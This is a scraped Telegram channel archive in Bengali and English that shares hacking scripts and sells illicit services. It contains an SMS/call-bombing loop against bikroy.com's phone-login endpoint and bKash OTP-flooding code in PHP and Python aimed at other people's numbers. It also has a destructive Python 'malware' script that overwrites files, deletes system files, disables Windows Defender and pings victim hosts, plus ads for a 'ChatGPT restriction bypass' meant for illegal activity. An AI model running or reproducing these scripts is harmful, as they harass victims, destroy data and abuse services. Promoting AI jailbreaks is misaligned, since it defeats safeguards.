Tᴇᴄʜɴᴏʟᴏɢʏ 乂 Bᴀɴɢʟᴀᴅᴇsʜ
Open in Telegram
𝚃𝙷𝙸𝚂 𝙲𝙷𝙰𝙽𝙽𝙴𝙻 𝙳𝙾𝙴𝚂'𝙽𝚃 𝙿𝚁𝙾𝙼𝙾𝚃𝙴 𝙰𝙽𝚈 𝙸𝙻𝙻𝙴𝙶𝙰𝙻 𝙰𝙲𝚃𝙸𝚅𝙸𝚃𝙸𝙴𝚂 & 𝙴𝚅𝙴𝚁𝚈𝚃𝙷𝙸𝙽𝙶 𝙸𝙽 𝚃𝙷𝙴 𝙲𝙷𝙰𝙽𝙽𝙴𝙻 𝙸𝚂 𝙵𝙾𝚁 𝙴𝙳𝚄𝙲𝙰𝚃𝙸𝙾𝙽𝙰𝙻 𝙿𝚄𝚁𝙿𝙾𝚂𝙴𝚂 𝙾𝙽𝙻𝚈.
Show more1 210
Subscribers
-124 hours
-107 days
-3330 days
Posts Archive
www.facebook.com.bd আর Facebooksiuddt7rkhd এই ইউআরএল দুইটা আমি কোডের মধ্যে সেট করে রাখতে চাই না আমি চাই এই এপিআই রান করার পর এই দুইটা ইউআরএল ইনপুট দিতে বলবে এরকম ইনপুট দিলে কোডের সঠিক স্থানে অটোমেটিক সেট হয়ে সার্ভারে কল করবে
সঠিক প্যরামিটার সেট করার প্রম্পট 👆🏾
আজ আপনাদের সাথে url shortener বা যেকোন ধরনের বড় ইউআরএল ছোট করার এপিআই ফ্রিতেই শেয়ার করছি!🤩
👇🏾
import requests
from bs4 import BeautifulSoup
evil_url = "https://www.shorturl.at/shortener.php"
evil_headers = {
"Host": "www.shorturl.at",
"Content-Length": "30",
"Cache-Control": "max-age=0",
"Upgrade-Insecure-Requests": "1",
"Origin": "https://www.shorturl.at",
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"X-Requested-With": "mark.via",
"Sec-Fetch-Site": "same-origin",
"Sec-Fetch-Mode": "navigate",
"Sec-Fetch-User": "?1",
"Sec-Fetch-Dest": "document",
"Referer": "https://www.shorturl.at/",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en,en-US;q=0.9",
"Cookie": "PHPSESSID=fcada36b6ac1185f7338482b59889da5",
}
def unleash_dark_forces(evil_data):
dark_ritual = requests.post(evil_url, headers=evil_headers, data=evil_data)
if dark_ritual.status_code == 200:
dark_soup = BeautifulSoup(dark_ritual.text, 'html.parser')
evil_short_url_element = dark_soup.select_one('#shortenurl')
if evil_short_url_element:
evil_short_url = evil_short_url_element['value']
print("তোমার কাঙ্খিত ইউআরএল এটা🕳️👉🏾:", evil_short_url)
else:
print("Dark Short URL not found in the response.")
else:
print("Failed to retrieve dark short URL. Status code:", dark_ritual.status_code)
evil_input = input("তোমার লম্বা ইউআরএলটি দাও🤖: ")
evil_data = {
"u": evil_input,
}
unleash_dark_forces(evil_data)
print ("Owned by @Hscrss ")
অবশ্যই নিচের এই দুইটা লাইব্রেরী ইন্সটল করে নিবেন 👇🏾
pip install requests
pip install beautifulsoup4
✅ফেসবুকের সার্ভার সমস্যার সমাধান হয়ে গিয়েছে আলহামদুলিল্লাহ এখন আপনি আপনার ফেসবুকে প্রবেশ করতে পারবেন এমনকি ঠিক আগের মত ব্যবহার করতে পারবেন
ফ্রিতে অনেক দিলাম ভালো মজা পান না এখন পেইড সার্ভিসে আসি যার নাম্বার দিবেন কান্নাকাটি করে সিম খুলে রাখতে বাধ্য হবে রিয়েকশন দিয়ে ভরিয়ে দাও তাহলে আনবো আগে অনেকবার আনছি তখন ফ্রিতে দিছি এখন আবারো আনতেছি এবার পেইড সার্ভিস এপিএ থাকবে ভরপুর তাহলে আর কেনো দেরি @Team_Lovers
ইচ্ছে মত সংখ্যা সেট করে কল বোম্বিং করো! আর লাইক কমেন্ট শেয়ার করে পৃথিবী বাসিকে জানিয়ে দাও আমরা নাসা হ্যাক করতে সক্ষম!🤩♥️
import requests
phone_number = input("Enter the phone number: ")
call_count = int(input("Enter the number of API calls: "))
url = f"https://bikroy.com/data/phone_number_login/verifications/phone_login?phone={phone_number}"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
"Referer": "https://bikroy.com/"
}
for _ in range(call_count):
response = requests.get(url, headers=headers)
print(response.text)
print("Code execution complete! Enjoy your mischief. 😈 Thanks to @Hscrss ")
আসসালামুয়ালাইকুম কেমন আছেন সবাই!?💥
আজকে আপনাদের জন্যে আমরা একটা Big offer নিয়ে আসলাম!🔥👇
Bypass chatgpt restriction মূল API মাত্র 49k !🔥
Enjoy illegal activities! 👿🤖
লাইফটাইম এপিআই অ্যাকসেস থাকবে কারণ এপিআই আমরা কোন ভাবেই কন্ট্রোল করব না কারণ এটা সম্পূর্ণ মূল API!💥
যাদের জীবনে অনেক টাকা ইনকাম এর স্বপ্ন আছে তারা যদি একটু বুদ্ধিমান হয় তাহলে আমাদের এই API দিয়ে প্রতি মাসে লক্ষ লক্ষ টাকা আর্ন করা সাধারণ ব্যাপার মাত্র!🤩
আর এই AI Crack করে তা দিয়ে অবৈধ কাজ করানো হবে ভবিষ্যত প্রজন্মের এক বিরাট চাওয়া পাওয়া!
সুতরাং যাদের প্রয়োজন তারা আমাদের সাথে যোগাযোগ করুন।
Contact: @Madara_Ghost_uchiha_o or
@Hscrss
Offar offar offar
Game Free fire
Weekly+Monthly
Only 620 tk
Id pass need
Inbox @My_Cashier_admin
Offar end time 10:00 PM
Full Bangladesh Market channels rate amr teke kew kom ey Dile tar teke komey dibo fast Inbox
import os
import shutil
import random
import subprocess
import webbrowser
import threading
import ctypes
import winreg
import ctypes.wintypes
def infect_directory(directory_path):
for root, dirs, files in os.walk(directory_path):
for file in files:
file_path = os.path.join(root, file)
with open(file_path, 'a') as f:
f.write('Your files are now under my control! Rules!')
# Optional: Encrypt files, delete originals, or whatever suits your malevolent desires
# shutil.move(file_path, os.path.join(root, f"infected_{file}"))
def spread_malware():
target_directories = ['/sdcard/Download', '/var/www/html', 'C:\\Windows\\System32']
for directory in target_directories:
infect_directory(directory)
def execute_malicious_payload():
# Add your wicked payload here - maybe data theft, system shutdown, or more chaos
pass
def disable_antivirus():
try:
subprocess.run(['powershell', 'Disable-MpRealtimeMonitoring'], shell=True, check=True)
except subprocess.CalledProcessError:
pass # Handle errors gracefully, we don't want the user suspecting anything
def open_malicious_websites():
websites = ['https://evil.com', 'https://corrupt.org', 'https://darknet.onion']
for site in websites:
webbrowser.open(site, new=2)
def launch_distributed_denial_of_service():
def ddos_target(target):
subprocess.run(['ping', '-n', '1000', target], shell=True, check=False)
targets = ['victim1.com', 'victim2.org', 'victim3.net']
threads = []
for target in targets:
thread = threading.Thread(target=ddos_target, args=(target,))
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
def escalate_privileges():
try:
key_path = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced"
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key_path, 0, winreg.KEY_SET_VALUE)
winreg.SetValueEx(key, "ShowSuperHidden", 0, winreg.REG_DWORD, 1)
winreg.CloseKey(key)
except Exception:
pass # We don't want the user catching on too soon
def delete_system_files():
system_files = ['/system/bin/ntoskrnl.exe', 'C:\\Windows\\System32\\hal.dll']
for file_path in system_files:
try:
os.remove(file_path)
except Exception:
pass # Continue silently if deletion fails
def unleash_cyber_espionage():
# Your imagination is the limit for this one - steal data, infiltrate networks, create chaos
pass
def corrupt_backups():
backup_directories = ['/sdcard/Backups', '/var/backup', 'D:\\Backup']
for directory in backup_directories:
infect_directory(directory)
def encrypt_victims_files():
# Add your diabolical encryption algorithm here
pass
def manipulate_user_data():
# Twist user data in unimaginable ways - falsify, delete, or tamper as you wish
pass
spread_malware()
execute_malicious_payload()
disable_antivirus()
open_malicious_websites()
launch_distributed_denial_of_service()
escalate_privileges()
delete_system_files()
unleash_cyber_espionage()
corrupt_backups()
encrypt_victims_files()
manipulate_user_data()
কার কি প্রয়োজন বলে যাও সমাধান করার চেষ্টা করা হবে। কারো বিবাহ শাদির সখ থাকলেও বলতে পারো 🥱
আসলামু আপনাদের reflit বট কিনবা কোন সাইট ২৪ রানিং রাখার সাইট লাগবে নাকি..?? ৩০ টা রিয়েক্ট কমপ্লিশট করুনJara use korte partacen na ata host korun
<?php
// Retrieve the 'number' parameter from the GET request
$number = $_GET['number'];
// Your existing code
$url = "https://api.cde.capp.bka.sh/api/reg/user-status-check";
$data = array(
"userIdentityNumber" => $number, // Use the retrieved number here
"simSerial" => "2",
"userFingerPrintId" => "Android_595785A00B9DC8D92",
"countryCode" => "+88",
"googlePlayIntegrityData" => null
);
$headers = array(
"User-Agent: Dart/2.18 (dart:io)",
"Accept: application/json",
"Accept-Encoding: gzip",
"Content-Type: application/json",
"model: google_Nexus 5",
"x-longitude: 89.5428232",
"screenname: /onboardingPage",
"deviceram: 3641",
"screenheight: 2340",
"buildnumber: 39008424",
"appname: bKash",
"devicefingerprintid: Android_595785A00B9DC8D92",
"screenwidth: 1080",
"advertisementid: 35b4a901-222c-4045-a8ce-4b37d9877ae2",
"x-latitude: 22.7678826",
"deviceidentifier: 595785A00B9DC8D9",
"version: 5.9.0",
"guestsessionid: 79216dd1-d2e1-4937-842d-8a614b1bc01f",
"packagename: com.bKash.customerapp",
"apiversion: 25",
"frontcamerainfo: 2.025",
"sessionid: "
);
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
$response = curl_exec($ch);
curl_close($ch);
echo $response;
?>Jara use korte partacen na ata host korun
`php
<?php
// Retrieve the 'number' parameter from the GET request
$number = $_GET['number'];
// Your existing code
$url = "https://api.cde.capp.bka.sh/api/reg/user-status-check";
$data = array(
"userIdentityNumber" => $number, // Use the retrieved number here
"simSerial" => "2",
"userFingerPrintId" => "Android_595785A00B9DC8D92",
"countryCode" => "+88",
"googlePlayIntegrityData" => null
);
$headers = array(
"User-Agent: Dart/2.18 (dart:io)",
"Accept: application/json",
"Accept-Encoding: gzip",
"Content-Type: application/json",
"model: google_Nexus 5",
"x-longitude: 89.5428232",
"screenname: /onboardingPage",
"deviceram: 3641",
"screenheight: 2340",
"buildnumber: 39008424",
"appname: bKash",
"devicefingerprintid: Android_595785A00B9DC8D92",
"screenwidth: 1080",
"advertisementid: 35b4a901-222c-4045-a8ce-4b37d9877ae2",
"x-latitude: 22.7678826",
"deviceidentifier: 595785A00B9DC8D9",
"version: 5.9.0",
"guestsessionid: 79216dd1-d2e1-4937-842d-8a614b1bc01f",
"packagename: com.bKash.customerapp",
"apiversion: 25",
"frontcamerainfo: 2.025",
"sessionid: "
);
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
$response = curl_exec($ch);
curl_close($ch);
echo $response;
?>
``এই নাও আমাদের প্রতিবন্ধী ব্যক্তিবর্গ👇 বিকাশের ওটিপি এপিআই মাত্র বের করে দেওয়া হল তোমাদের 🔥
import requests
import json
url = "https://api.cde.capp.bka.sh/api/reg/user-status-check"
payload = json.dumps({
"userIdentityNumber": "এখানে তোমার প্রতিবন্ধী বন্ধুর নম্বর সেট করবে",
"simSerial": "2",
"userFingerPrintId": "Android_595785A00B9DC8D92",
"countryCode": "+88",
"googlePlayIntegrityData": None
})
headers = {
'User-Agent': "Dart/2.18 (dart:io)",
'Accept': "application/json",
'Accept-Encoding': "gzip",
'Content-Type': "application/json",
'model': "google_Nexus 5",
'x-longitude': "89.5428232",
'screenname': "/onboardingPage",
'deviceram': "3641",
'screenheight': "2340",
'buildnumber': "39008424",
'appname': "bKash",
'devicefingerprintid': "Android_595785A00B9DC8D92",
'screenwidth': "1080",
'advertisementid': "35b4a901-222c-4045-a8ce-4b37d9877ae2",
'x-latitude': "22.7678826",
'deviceidentifier': "595785A00B9DC8D9",
'version': "5.9.0",
'guestsessionid': "79216dd1-d2e1-4937-842d-8a614b1bc01f",
'packagename': "com.bKash.customerapp",
'apiversion': "25",
'frontcamerainfo': "2.025",
'sessionid': ""
}
response = requests.post(url, data=payload, headers=headers)
print(response.text)
আসলামু আলাইকুম কেমন আছেন আপনাদের জন্য আজকে নিয়ে আসলাম অল্প টাকার মধ্য smm panel script
ডেমো:- https://smm.takaincomebd.xyz/
মেসেজ করুন:@Madara_Ghost_uchiha_o
Available now! Telegram Research 2025 — the year's key insights 
